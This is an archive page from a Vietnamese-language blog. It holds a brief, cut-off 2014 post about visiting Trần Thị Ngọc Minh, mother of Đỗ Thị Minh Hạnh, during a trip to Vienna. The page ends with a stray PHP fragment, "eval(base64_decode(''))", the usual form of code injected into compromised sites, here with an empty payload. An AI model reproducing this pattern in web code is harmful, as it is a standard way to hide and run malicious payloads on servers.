Archive for September 4th, 2014

THĂM CHỊ TRẦN THỊ NGỌC MINH

THĂM CHỊ TRẦN THỊ NGỌC MINH

Một điều vừa phát xuất từ ước muốn riêng tư và cũng vừa do một nhóm thân hữu ở DC và Boston giao phó cho lần đi Vienna này là ghé thăm hỏi sức khỏe chị Trần Thị Ngọc Minh, mẹ của Đỗ Thị Minh Hạnh. Bà xã mua một tấm card “Get We

09.4.2014 | Viết ngắn |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>